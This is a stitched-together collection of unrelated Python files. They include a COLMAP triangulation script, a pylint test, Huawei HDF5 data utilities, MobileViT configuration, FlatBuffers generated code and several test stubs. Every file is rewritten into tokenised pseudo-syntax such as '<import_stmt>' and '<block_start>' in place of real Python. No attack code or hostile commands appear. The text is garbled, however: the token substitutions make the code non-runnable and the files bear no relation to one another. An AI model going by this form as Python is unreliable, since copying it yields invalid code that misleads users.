<import_stmt>argparse<import_stmt>os<import_stmt>shutil<import_stmt>types<import_from_stmt>colmap_utils generate_empty_reconstruction import_features triangulate<def_stmt>parse_args <block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('--dataset_path' type=str required=<true> help='path to the dataset')<line_sep>parser.add_argument('--colmap_path' type=str required=<true> help='path to the COLMAP executable folder')<line_sep>parser.add_argument('--method_name' type=str required=<true> help='name of the method')<line_sep>parser.add_argument('--matches_file' type=str required=<true> help='path to the matches file')<line_sep>parser.add_argument('--solution_file' type=str default=<none> help='path to the multi-view optimization solution file (leave None for no refinement)')<line_sep>args=parser.parse_args()<line_sep><return>args<block_end><if_stmt>__name__<eq>"__main__"<block_start>args=parse_args()<line_sep>refine=(args.solution_file<is><not><none>)<line_sep># Create the extra paths.
paths=types.SimpleNamespace()<line_sep>paths.database_path=os.path.join(args.dataset_path '%s-%s.db'%(args.method_name 'ref'<if>refine<else>'raw'))<line_sep>paths.image_path=os.path.join(args.dataset_path 'images')<line_sep>paths.reference_model_path=os.path.join(args.dataset_path 'dslr_calibration_undistorted')<line_sep>paths.match_list_path=os.path.join(args.dataset_path 'match-list.txt')<line_sep>paths.empty_model_path=os.path.join(args.dataset_path 'sparse-%s-%s-empty'%(args.method_name 'ref'<if>refine<else>'raw'))<line_sep>paths.model_path=os.path.join(args.dataset_path 'sparse-%s-%s'%(args.method_name 'ref'<if>refine<else>'raw'))<line_sep>paths.ply_model_path=os.path.join(args.dataset_path 'sparse-%s-%s.ply'%(args.method_name 'ref'<if>refine<else>'raw'))<line_sep># Create a copy of the dummy database.
<if_stmt>os.path.exists(paths.database_path)<block_start><raise>FileExistsError('The database file already exists.')<block_end>shutil.copyfile(os.path.join(args.dataset_path 'database.db') paths.database_path)<line_sep># Reconstruction pipeline.
_=generate_empty_reconstruction(paths.reference_model_path paths.empty_model_path)<line_sep>import_features(args.colmap_path args.method_name paths.database_path paths.image_path paths.match_list_path args.matches_file args.solution_file)<line_sep>triangulate(args.colmap_path paths.database_path paths.image_path paths.empty_model_path paths.model_path paths.ply_model_path)<block_end>
|
#pylint: disable=invalid-name,missing-docstring
# Basic test with a list
TEST_LIST1=['a'<concat>'b']# [implicit-str-concat]
# Testing with unicode strings in a tuple, with a comma AFTER concatenation
TEST_LIST2=(u"a"<concat>u"b" u"c")# [implicit-str-concat]
# Testing with raw strings in a set, with a comma BEFORE concatenation
TEST_LIST3={r'''a''' r'''b'''<concat>r'''c'''}# [implicit-str-concat]
# Testing that only ONE warning is generated when string concatenation happens
# in the middle of a list
TEST_LIST4=["""a""" """b"""<concat>"""c""" """d"""]# [implicit-str-concat]
# The following shouldn't raise a warning because it is a function call
print('a' 'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'<concat>'ccc')<line_sep># The following shouldn't raise a warning because string literals are
# on different lines
TEST_LIST5=('a' 'b'<concat>'c')<line_sep># The following shouldn't raise a warning because of the escaped newline
TEST_LIST6=('bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb \
ccc')<line_sep># But we should emit when there is an actual juxtaposition
# +1: [implicit-str-concat]
TEST_LIST7=('a'<concat>'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb \
ccc')<line_sep># No warning for bytes
TEST_LIST8=[b'A'<concat>b'B']<line_sep>
|
# =========================================================================
# Copyright (C) 2021. Huawei Technologies Co., Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =========================================================================
<import_stmt>h5py<import_stmt>os<import_stmt>logging<import_stmt>numpy<as>np<import_stmt>gc<import_stmt>glob<def_stmt>save_hdf5 data_array data_path key="data"<block_start>logging.info("Saving data to h5: "+data_path)<if_stmt><not>os.path.exists(os.path.dirname(data_path))<block_start>os.makedirs(os.path.dirname(data_path))<block_end><with_stmt>h5py.File(data_path 'w')<as>hf<block_start>hf.create_dataset(key data=data_array)<block_end><block_end><def_stmt>load_hdf5 data_path key=<none> verbose=<true><block_start><if_stmt>verbose<block_start>logging.info('Loading data from h5: '+data_path)<block_end><with_stmt>h5py.File(data_path 'r')<as>hf<block_start><if_stmt>key<is><not><none><block_start>data_array=hf[key][:]<block_end><else_stmt><block_start>data_array=hf[list(hf.keys())[0]][:]<block_end><block_end><return>data_array<block_end><def_stmt>split_train_test train_ddf=<none> valid_ddf=<none> test_ddf=<none> valid_size=0 test_size=0 split_type="sequential"<block_start>num_samples=len(train_ddf)<line_sep>train_size=num_samples<line_sep>instance_IDs=np.arange(num_samples)<if_stmt>split_type<eq>"random"<block_start>np.random.shuffle(instance_IDs)<block_end><if_stmt>test_size<g>0<block_start><if_stmt>test_size<l>1<block_start>test_size=int(num_samples<times>test_size)<block_end>train_size=train_size-test_size<line_sep>test_ddf=train_ddf.loc[instance_IDs[train_size:] :].reset_index()<line_sep>instance_IDs=instance_IDs[0:train_size]<block_end><if_stmt>valid_size<g>0<block_start><if_stmt>valid_size<l>1<block_start>valid_size=int(num_samples<times>valid_size)<block_end>train_size=train_size-valid_size<line_sep>valid_ddf=train_ddf.loc[instance_IDs[train_size:] :].reset_index()<line_sep>instance_IDs=instance_IDs[0:train_size]<block_end><if_stmt>valid_size<g>0<or>test_size<g>0<block_start>train_ddf=train_ddf.loc[instance_IDs :].reset_index()<block_end><return>train_ddf valid_ddf test_ddf<block_end><def_stmt>build_dataset feature_encoder train_data=<none> valid_data=<none> test_data=<none> valid_size=0 test_size=0 split_type="sequential" **kwargs<block_start>""" Build feature_map and transform h5 data """<line_sep># Load csv data
train_ddf=feature_encoder.read_csv(train_data)<line_sep>valid_ddf=feature_encoder.read_csv(valid_data)<if>valid_data<else><none><line_sep>test_ddf=feature_encoder.read_csv(test_data)<if>test_data<else><none><line_sep># Split data for train/validation/test
<if_stmt>valid_size<g>0<or>test_size<g>0<block_start>train_ddf,valid_ddf,test_ddf=split_train_test(train_ddf valid_ddf test_ddf valid_size test_size split_type)<block_end># fit and transform train_ddf
train_ddf=feature_encoder.preprocess(train_ddf)<line_sep>train_array=feature_encoder.fit_transform(train_ddf **kwargs)<line_sep>block_size=int(kwargs.get("data_block_size" 0))<if_stmt>block_size<g>0<block_start>block_id=0<for_stmt>idx range(0 len(train_array) block_size)<block_start>save_hdf5(train_array[idx:(idx+block_size) :] os.path.join(feature_encoder.data_dir 'train_part_{}.h5'.format(block_id)))<line_sep>block_id<augadd>1<block_end><block_end><else_stmt><block_start>save_hdf5(train_array os.path.join(feature_encoder.data_dir 'train.h5'))<block_end><del_stmt>train_array train_ddf<line_sep>gc.collect()<line_sep># Transfrom valid_ddf
<if_stmt>valid_ddf<is><not><none><block_start>valid_ddf=feature_encoder.preprocess(valid_ddf)<line_sep>valid_array=feature_encoder.transform(valid_ddf)<if_stmt>block_size<g>0<block_start>block_id=0<for_stmt>idx range(0 len(valid_array) block_size)<block_start>save_hdf5(valid_array[idx:(idx+block_size) :] os.path.join(feature_encoder.data_dir 'valid_part_{}.h5'.format(block_id)))<line_sep>block_id<augadd>1<block_end><block_end><else_stmt><block_start>save_hdf5(valid_array os.path.join(feature_encoder.data_dir 'valid.h5'))<block_end><del_stmt>valid_array valid_ddf<line_sep>gc.collect()<block_end># Transfrom test_ddf
<if_stmt>test_ddf<is><not><none><block_start>test_ddf=feature_encoder.preprocess(test_ddf)<line_sep>test_array=feature_encoder.transform(test_ddf)<if_stmt>block_size<g>0<block_start>block_id=0<for_stmt>idx range(0 len(test_array) block_size)<block_start>save_hdf5(test_array[idx:(idx+block_size) :] os.path.join(feature_encoder.data_dir 'test_part_{}.h5'.format(block_id)))<line_sep>block_id<augadd>1<block_end><block_end><else_stmt><block_start>save_hdf5(test_array os.path.join(feature_encoder.data_dir 'test.h5'))<block_end><del_stmt>test_array test_ddf<line_sep>gc.collect()<block_end>logging.info("Transform csv data to h5 done.")<block_end><def_stmt>h5_generator feature_map stage="both" train_data=<none> valid_data=<none> test_data=<none> batch_size=32 shuffle=<true> **kwargs<block_start>logging.info("Loading data...")<if_stmt>kwargs.get("data_block_size" 0)<g>0<block_start><import_from_stmt>..pytorch.data_generator DataBlockGenerator<as>DataGenerator<block_end><else_stmt><block_start><import_from_stmt>..pytorch.data_generator DataGenerator<block_end>train_gen=<none><line_sep>valid_gen=<none><line_sep>test_gen=<none><if_stmt>stage<in>["both" "train"]<block_start>train_blocks=glob.glob(train_data)<line_sep>valid_blocks=glob.glob(valid_data)<assert_stmt>len(train_blocks)<g>0<and>len(valid_blocks)<g>0 "invalid data files or paths."<if_stmt>len(train_blocks)<g>1<block_start>train_blocks.sort(key=<lambda>x:int(x.split("_")[-1].split(".")[0]))<block_end><if_stmt>len(valid_blocks)<g>1<block_start>valid_blocks.sort(key=<lambda>x:int(x.split("_")[-1].split(".")[0]))<block_end>train_gen=DataGenerator(train_blocks batch_size=batch_size shuffle=shuffle **kwargs)<line_sep>valid_gen=DataGenerator(valid_blocks batch_size=batch_size shuffle=<false> **kwargs)<line_sep>logging.info("Train samples: total/{:d}, pos/{:.0f}, neg/{:.0f}, ratio/{:.2f}%, blocks/{:.0f}".format(train_gen.num_samples train_gen.num_positives train_gen.num_negatives 100.<times>train_gen.num_positives/train_gen.num_samples train_gen.num_blocks))<line_sep>logging.info("Validation samples: total/{:d}, pos/{:.0f}, neg/{:.0f}, ratio/{:.2f}%, blocks/{:.0f}".format(valid_gen.num_samples valid_gen.num_positives valid_gen.num_negatives 100.<times>valid_gen.num_positives/valid_gen.num_samples valid_gen.num_blocks))<if_stmt>stage<eq>"train"<block_start>logging.info("Loading train data done.")<line_sep><return>train_gen valid_gen<block_end><block_end><if_stmt>stage<in>["both" "test"]<block_start>test_blocks=glob.glob(test_data)<if_stmt>len(test_blocks)<g>0<block_start><if_stmt>len(test_blocks)<g>1<block_start>test_blocks.sort(key=<lambda>x:int(x.split("_")[-1].split(".")[0]))<block_end>test_gen=DataGenerator(test_blocks batch_size=batch_size shuffle=<false> **kwargs)<line_sep>logging.info("Test samples: total/{:d}, pos/{:.0f}, neg/{:.0f}, ratio/{:.2f}%, blocks/{:.0f}".format(test_gen.num_samples test_gen.num_positives test_gen.num_negatives 100.<times>test_gen.num_positives/test_gen.num_samples test_gen.num_blocks))<block_end><if_stmt>stage<eq>"test"<block_start>logging.info("Loading test data done.")<line_sep><return>test_gen<block_end><block_end>logging.info("Loading data done.")<line_sep><return>train_gen valid_gen test_gen<block_end><def_stmt>tfrecord_generator <block_start><raise>NotImplementedError()<block_end>
|
<import_from_stmt>dataclasses dataclass field<import_from_stmt>typing Optional<import_from_stmt>mashumaro DataClassDictMixin field_options<import_from_stmt>mashumaro.config TO_DICT_ADD_BY_ALIAS_FLAG TO_DICT_ADD_OMIT_NONE_FLAG BaseConfig <line_sep>@dataclass<class_stmt>A(DataClassDictMixin)<block_start>x:Optional[int]=<none><class_stmt>Config(BaseConfig)<block_start>aliases={"x":"x_alias"}<line_sep>code_generation_options=[TO_DICT_ADD_OMIT_NONE_FLAG TO_DICT_ADD_BY_ALIAS_FLAG ]<block_end><block_end>@dataclass<class_stmt>B(DataClassDictMixin)<block_start>a:Optional[A]=<none><class_stmt>Config(BaseConfig)<block_start>aliases={"a":"a_alias"}<line_sep>code_generation_options=[TO_DICT_ADD_OMIT_NONE_FLAG TO_DICT_ADD_BY_ALIAS_FLAG ]<block_end><block_end><def_stmt>test_passing_flags_if_parent_has_them <block_start>@dataclass<class_stmt>WithFlags(DataClassDictMixin)<block_start>b:B<class_stmt>Config(BaseConfig)<block_start>code_generation_options=[TO_DICT_ADD_OMIT_NONE_FLAG TO_DICT_ADD_BY_ALIAS_FLAG ]<block_end><block_end><assert_stmt>WithFlags.from_dict({"b":{"a":{"x":<none>}}})<eq>WithFlags(b=B(a=<none>))<line_sep>obj=WithFlags.from_dict({"b":{"a_alias":{"x":<none>}}})<assert_stmt>obj<eq>WithFlags(b=B(a=A(x=<none>)))<assert_stmt>obj.to_dict()<eq>{"b":{"a":{"x":<none>}}}<assert_stmt>obj.to_dict(by_alias=<true>)<eq>{"b":{"a_alias":{"x_alias":<none>}}}<assert_stmt>obj.to_dict(by_alias=<true> omit_none=<true>)<eq>{"b":{"a_alias":{}}}<block_end><def_stmt>test_passing_flags_if_parent_does_not_have_them <block_start>@dataclass<class_stmt>WithoutFlags(DataClassDictMixin)<block_start>b:B<block_end><assert_stmt>WithoutFlags.from_dict({"b":{"a":{"x":<none>}}})<eq>WithoutFlags(b=B(a=<none>))<line_sep>obj=WithoutFlags.from_dict({"b":{"a_alias":{"x":<none>}}})<assert_stmt>obj<eq>WithoutFlags(b=B(a=A(x=<none>)))<assert_stmt>obj.to_dict()<eq>{"b":{"a":{"x":<none>}}}<block_end>
|
#
# For licensing see accompanying LICENSE file.
# Copyright (C) 2022 Apple Inc. All Rights Reserved.
#
<import_from_stmt>typing Dict<import_from_stmt>utils logger<def_stmt>get_configuration opts<arrow>Dict<block_start>mode=getattr(opts "model.classification.mit.mode" "small")<if_stmt>mode<is><none><block_start>logger.error("Please specify mode")<block_end>head_dim=getattr(opts "model.classification.mit.head_dim" <none>)<line_sep>num_heads=getattr(opts "model.classification.mit.number_heads" 4)<if_stmt>head_dim<is><not><none><block_start><if_stmt>num_heads<is><not><none><block_start>logger.error("--model.classification.mit.head-dim and --model.classification.mit.number-heads "<concat>"are mutually exclusive.")<block_end><block_end><elif_stmt>num_heads<is><not><none><block_start><if_stmt>head_dim<is><not><none><block_start>logger.error("--model.classification.mit.head-dim and --model.classification.mit.number-heads "<concat>"are mutually exclusive.")<block_end><block_end>mode=mode.lower()<if_stmt>mode<eq>"xx_small"<block_start>mv2_exp_mult=2<line_sep>config={"layer1":{"out_channels":16 "expand_ratio":mv2_exp_mult "num_blocks":1 "stride":1 "block_type":"mv2" } "layer2":{"out_channels":24 "expand_ratio":mv2_exp_mult "num_blocks":3 "stride":2 "block_type":"mv2" } "layer3":{# 28x28
"out_channels":48 "transformer_channels":64 "ffn_dim":128 "transformer_blocks":2 "patch_h":2 # 8,
"patch_w":2 # 8,
"stride":2 "mv_expand_ratio":mv2_exp_mult "head_dim":head_dim "num_heads":num_heads "block_type":"mobilevit" } "layer4":{# 14x14
"out_channels":64 "transformer_channels":80 "ffn_dim":160 "transformer_blocks":4 "patch_h":2 # 4,
"patch_w":2 # 4,
"stride":2 "mv_expand_ratio":mv2_exp_mult "head_dim":head_dim "num_heads":num_heads "block_type":"mobilevit" } "layer5":{# 7x7
"out_channels":80 "transformer_channels":96 "ffn_dim":192 "transformer_blocks":3 "patch_h":2 "patch_w":2 "stride":2 "mv_expand_ratio":mv2_exp_mult "head_dim":head_dim "num_heads":num_heads "block_type":"mobilevit" } "last_layer_exp_factor":4 }<block_end><elif_stmt>mode<eq>"x_small"<block_start>mv2_exp_mult=4<line_sep>config={"layer1":{"out_channels":32 "expand_ratio":mv2_exp_mult "num_blocks":1 "stride":1 "block_type":"mv2" } "layer2":{"out_channels":48 "expand_ratio":mv2_exp_mult "num_blocks":3 "stride":2 "block_type":"mv2" } "layer3":{# 28x28
"out_channels":64 "transformer_channels":96 "ffn_dim":192 "transformer_blocks":2 "patch_h":2 "patch_w":2 "stride":2 "mv_expand_ratio":mv2_exp_mult "head_dim":head_dim "num_heads":num_heads "block_type":"mobilevit" } "layer4":{# 14x14
"out_channels":80 "transformer_channels":120 "ffn_dim":240 "transformer_blocks":4 "patch_h":2 "patch_w":2 "stride":2 "mv_expand_ratio":mv2_exp_mult "head_dim":head_dim "num_heads":num_heads "block_type":"mobilevit" } "layer5":{# 7x7
"out_channels":96 "transformer_channels":144 "ffn_dim":288 "transformer_blocks":3 "patch_h":2 "patch_w":2 "stride":2 "mv_expand_ratio":mv2_exp_mult "head_dim":head_dim "num_heads":num_heads "block_type":"mobilevit" } "last_layer_exp_factor":4 }<block_end><elif_stmt>mode<eq>"small"<block_start>mv2_exp_mult=4<line_sep>config={"layer1":{"out_channels":32 "expand_ratio":mv2_exp_mult "num_blocks":1 "stride":1 "block_type":"mv2" } "layer2":{"out_channels":64 "expand_ratio":mv2_exp_mult "num_blocks":3 "stride":2 "block_type":"mv2" } "layer3":{# 28x28
"out_channels":96 "transformer_channels":144 "ffn_dim":288 "transformer_blocks":2 "patch_h":2 "patch_w":2 "stride":2 "mv_expand_ratio":mv2_exp_mult "head_dim":head_dim "num_heads":num_heads "block_type":"mobilevit" } "layer4":{# 14x14
"out_channels":128 "transformer_channels":192 "ffn_dim":384 "transformer_blocks":4 "patch_h":2 "patch_w":2 "stride":2 "mv_expand_ratio":mv2_exp_mult "head_dim":head_dim "num_heads":num_heads "block_type":"mobilevit" } "layer5":{# 7x7
"out_channels":160 "transformer_channels":240 "ffn_dim":480 "transformer_blocks":3 "patch_h":2 "patch_w":2 "stride":2 "mv_expand_ratio":mv2_exp_mult "head_dim":head_dim "num_heads":num_heads "block_type":"mobilevit" } "last_layer_exp_factor":4 }<block_end><else_stmt><block_start><raise>NotImplementedError<block_end><return>config<block_end>
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
<import_stmt>aiounittest<import_from_stmt>botbuilder.dialogs DialogSet<import_from_stmt>botbuilder.core MemoryStorage ConversationState<class_stmt>PromptValidatorContextTests(aiounittest.AsyncTestCase)<block_start><async_keyword><def_stmt>test_prompt_validator_context_end self<block_start>storage=MemoryStorage()<line_sep>conv=ConversationState(storage)<line_sep>accessor=conv.create_property("dialogstate")<line_sep>dialog_set=DialogSet(accessor)<line_sep>self.assertNotEqual(dialog_set <none>)<line_sep># TODO: Add TestFlow
<block_end><def_stmt>test_prompt_validator_context_retry_end self<block_start>storage=MemoryStorage()<line_sep>conv=ConversationState(storage)<line_sep>accessor=conv.create_property("dialogstate")<line_sep>dialog_set=DialogSet(accessor)<line_sep>self.assertNotEqual(dialog_set <none>)<line_sep># TODO: Add TestFlow
<block_end># All require Testflow!
<block_end>
|
<import_stmt>sys<import_stmt>fnmatch<import_stmt>os<line_sep>collect_ignore=["setup.py"]<if_stmt>sys.version_info<l>(3 5)<block_start><for_stmt>root,dirnames,filenames os.walk('.')<block_start><for_stmt>filename fnmatch.filter(filenames '*aio.py')<block_start>collect_ignore.append(os.path.join(root filename))<block_end><block_end><block_end>
|
<import_from_stmt>abc abstractmethod ABC<import_from_stmt>dataclasses dataclass<import_from_stmt>enum Enum<import_from_stmt>typing Any Mapping Optional<import_stmt>aiohttp<import_stmt>ujson<class_stmt>RESTMethod(Enum)<block_start>GET="GET"<line_sep>POST="POST"<line_sep>PUT="PUT"<line_sep>DELETE="DELETE"<def_stmt>__str__ self<block_start>obj_str=repr(self)<line_sep><return>obj_str<block_end><def_stmt>__repr__ self<block_start><return>self.value<block_end><block_end>@dataclass<class_stmt>RESTRequest<block_start>method:RESTMethod<line_sep>url:Optional[str]=<none><line_sep>params:Optional[Mapping[str str]]=<none><line_sep>data:Any=<none><line_sep>headers:Optional[Mapping[str str]]=<none><line_sep>is_auth_required:bool=<false><line_sep>throttler_limit_id:Optional[str]=<none><block_end>@dataclass<class_stmt>EndpointRESTRequest(RESTRequest ABC)<block_start>"""This request class enable the user to provide either a complete URL or simply an endpoint.
The endpoint is concatenated with the return value of `base_url`. It can handle endpoints supplied both as
`"endpoint"` and `"/endpoint"`. It also provides the necessary checks to ensure a valid URL can be constructed.
"""<line_sep>endpoint:Optional[str]=<none><def_stmt>__post_init__ self<block_start>self._ensure_url()<line_sep>self._ensure_params()<line_sep>self._ensure_data()<block_end>@property@abstractmethod<def_stmt>base_url self<arrow>str<block_start><ellipsis><block_end><def_stmt>_ensure_url self<block_start><if_stmt>self.url<is><none><and>self.endpoint<is><none><block_start><raise>ValueError("Either the full url or the endpoint must be specified.")<block_end><if_stmt>self.url<is><none><block_start><if_stmt>self.endpoint.startswith("/")<block_start>self.url=f"{self.base_url}{self.endpoint}"<block_end><else_stmt><block_start>self.url=f"{self.base_url}/{self.endpoint}"<block_end><block_end><block_end><def_stmt>_ensure_params self<block_start><if_stmt>self.method<eq>RESTMethod.POST<block_start><if_stmt>self.params<is><not><none><block_start><raise>ValueError("POST requests should not use `params`. Use `data` instead.")<block_end><block_end><block_end><def_stmt>_ensure_data self<block_start><if_stmt>self.method<eq>RESTMethod.POST<block_start><if_stmt>self.data<is><not><none><block_start>self.data=ujson.dumps(self.data)<block_end><block_end><elif_stmt>self.data<is><not><none><block_start><raise>ValueError("The `data` field should be used only for POST requests. Use `params` instead.")<block_end><block_end><block_end>@dataclass(init=<false>)<class_stmt>RESTResponse<block_start>url:str<line_sep>method:RESTMethod<line_sep>status:int<line_sep>headers:Optional[Mapping[str str]]<def_stmt>__init__ self aiohttp_response:aiohttp.ClientResponse<block_start>self._aiohttp_response=aiohttp_response<block_end>@property<def_stmt>url self<arrow>str<block_start>url_str=str(self._aiohttp_response.url)<line_sep><return>url_str<block_end>@property<def_stmt>method self<arrow>RESTMethod<block_start>method_=RESTMethod[self._aiohttp_response.method.upper()]<line_sep><return>method_<block_end>@property<def_stmt>status self<arrow>int<block_start>status_=int(self._aiohttp_response.status)<line_sep><return>status_<block_end>@property<def_stmt>headers self<arrow>Optional[Mapping[str str]]<block_start>headers_=self._aiohttp_response.headers<line_sep><return>headers_<block_end><async_keyword><def_stmt>json self<arrow>Any<block_start>json_=<await>self._aiohttp_response.json()<line_sep><return>json_<block_end><async_keyword><def_stmt>text self<arrow>str<block_start>text_=<await>self._aiohttp_response.text()<line_sep><return>text_<block_end><block_end>@dataclass<class_stmt>WSRequest<block_start>payload:Mapping[str Any]<line_sep>throttler_limit_id:Optional[str]=<none><line_sep>is_auth_required:bool=<false><block_end>@dataclass<class_stmt>WSResponse<block_start>data:Any<block_end>
|
# -*- coding: utf-8 -*-
<import_from_future_stmt> unicode_literals<import_from_stmt>django.db migrations models<import_stmt>django.db.models.deletion<import_from_stmt>django.conf settings<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('operations' '0007_auto_20170328_1728') ]<line_sep>operations=[migrations.AlterField(model_name='operation' name='assignee' field=models.ForeignKey(verbose_name='assignee' blank=<true> to=settings.AUTH_USER_MODEL null=<true> related_name='operations' on_delete=django.db.models.deletion.PROTECT) ) ]<block_end>
|
<import_stmt>lldb<import_from_stmt>lldbsuite.test.decorators *<import_from_stmt>lldbsuite.test.lldbtest *<import_from_stmt>lldbsuite.test lldbutil<class_stmt>TestCase(TestBase)<block_start>mydir=TestBase.compute_mydir(__file__)<line_sep>@skipUnlessDarwin# LLDB ends up calling the user-defined function (but at least doesn't
# crash).
@expectedFailureDarwin<def_stmt>test self<block_start>"""
Tests LLDB's behaviour if the user defines their own conflicting
objc_copyRealizedClassList_nolock function.
"""<line_sep>self.build()<line_sep>lldbutil.run_to_source_breakpoint(self "// break here" lldb.SBFileSpec("main.m"))<line_sep># Get the (dynamic) type of our 'id' variable so that our Objective-C
# runtime information is updated.
str_val=self.expect_expr("custom_class")<line_sep>dyn_val=str_val.GetDynamicValue(lldb.eDynamicCanRunTarget)<line_sep># We should have retrieved the proper class list even in presence of
# the user-defined function.
self.assertEqual(dyn_val.GetTypeName() "CustomClass *")<block_end><block_end>
|
<import_from_stmt>.website make_website_files<line_sep>
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017-2020 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
<import_stmt>importlib<import_stmt>os<line_sep>COLORS_CONFIG='''\
? !!python/tuple
- 0
- 100
- 80
: Foo
? !!python/tuple
- 25
- 20
- 20
: Bar
? !!python/tuple
- 25
- 230
- 140
: Baz
'''<line_sep>EXPECTED_COLORS={'style.color_palette_categorical':'My Palette' 'style.color_palette_sequential':'Midnight Orange Sequential' 'style.color_palette_diverging':'Midnight Orange Diverging' 'style.color_palette_accent':'My Palette' 'style.color_palette_accent_default_color':'light grey' }<def_stmt>test_colors_config monkeypatch tmpdir<block_start>f=tmpdir.join('colors_config.yaml')<line_sep>f.write(COLORS_CONFIG)<line_sep># XXX (dano): CHARTIFY_CONFIG_DIR must end with /
monkeypatch.setenv('CHARTIFY_CONFIG_DIR' os.path.join(str(tmpdir) ''))<line_sep># reload modules to reload configuration
<import_stmt>chartify._core.options<import_stmt>chartify._core.colors<import_stmt>chartify._core.style<line_sep>importlib.reload(chartify._core.options)<line_sep>importlib.reload(chartify._core.colors)<import_stmt>chartify._core.colour<as>colour<assert_stmt>colour.COLOR_NAME_TO_RGB['foo']<eq>(0 100 80)<assert_stmt>colour.COLOR_NAME_TO_RGB['bar']<eq>(25 20 20)<assert_stmt>colour.COLOR_NAME_TO_RGB['baz']<eq>(25 230 140)<block_end>
|
#encoding:utf-8
subreddit='india'<line_sep>t_channel='@r_indiaa'<def_stmt>send_post submission r2t<block_start><return>r2t.send_simple(submission)<block_end>
|
# automatically generated by the FlatBuffers compiler, do not modify
# namespace:
<import_stmt>flatbuffers<import_from_stmt>flatbuffers.compat import_numpy<line_sep>np=import_numpy()<class_stmt>Package(object)<block_start>__slots__=['_tab']<line_sep>@classmethod<def_stmt>GetRootAs cls buf offset=0<block_start>n=flatbuffers.encode.Get(flatbuffers.packer.uoffset buf offset)<line_sep>x=Package()<line_sep>x.Init(buf n+offset)<line_sep><return>x<block_end>@classmethod<def_stmt>GetRootAsPackage cls buf offset=0<block_start>"""This method is deprecated. Please switch to GetRootAs."""<line_sep><return>cls.GetRootAs(buf offset)<block_end># Package
<def_stmt>Init self buf pos<block_start>self._tab=flatbuffers.table.Table(buf pos)<block_end># Package
<def_stmt>Type self<block_start>o=flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))<if_stmt>o<ne>0<block_start><return>self._tab.Get(flatbuffers.number_types.Int8Flags o+self._tab.Pos)<block_end><return>0<block_end># Package
<def_stmt>Name self<block_start>o=flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))<if_stmt>o<ne>0<block_start><return>self._tab.String(o+self._tab.Pos)<block_end><return><none><block_end># Package
<def_stmt>Sid self<block_start>o=flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))<if_stmt>o<ne>0<block_start><return>self._tab.Get(flatbuffers.number_types.Uint64Flags o+self._tab.Pos)<block_end><return>0<block_end># Package
<def_stmt>InitPayload self<block_start>o=flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10))<if_stmt>o<ne>0<block_start>x=self._tab.Indirect(o+self._tab.Pos)<import_from_stmt>Serialized Serialized<line_sep>obj=Serialized()<line_sep>obj.Init(self._tab.Bytes x)<line_sep><return>obj<block_end><return><none><block_end><block_end><def_stmt>Start builder<block_start>builder.StartObject(4)<block_end><def_stmt>PackageStart builder<block_start>"""This method is deprecated. Please switch to Start."""<line_sep><return>Start(builder)<block_end><def_stmt>AddType builder type<block_start>builder.PrependInt8Slot(0 type 0)<block_end><def_stmt>PackageAddType builder type<block_start>"""This method is deprecated. Please switch to AddType."""<line_sep><return>AddType(builder type)<block_end><def_stmt>AddName builder name<block_start>builder.PrependUOffsetTRelativeSlot(1 flatbuffers.number_types.UOffsetTFlags.py_type(name) 0)<block_end><def_stmt>PackageAddName builder name<block_start>"""This method is deprecated. Please switch to AddName."""<line_sep><return>AddName(builder name)<block_end><def_stmt>AddSid builder sid<block_start>builder.PrependUint64Slot(2 sid 0)<block_end><def_stmt>PackageAddSid builder sid<block_start>"""This method is deprecated. Please switch to AddSid."""<line_sep><return>AddSid(builder sid)<block_end><def_stmt>AddInitPayload builder initPayload<block_start>builder.PrependUOffsetTRelativeSlot(3 flatbuffers.number_types.UOffsetTFlags.py_type(initPayload) 0)<block_end><def_stmt>PackageAddInitPayload builder initPayload<block_start>"""This method is deprecated. Please switch to AddInitPayload."""<line_sep><return>AddInitPayload(builder initPayload)<block_end><def_stmt>End builder<block_start><return>builder.EndObject()<block_end><def_stmt>PackageEnd builder<block_start>"""This method is deprecated. Please switch to End."""<line_sep><return>End(builder)<block_end>
|
# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
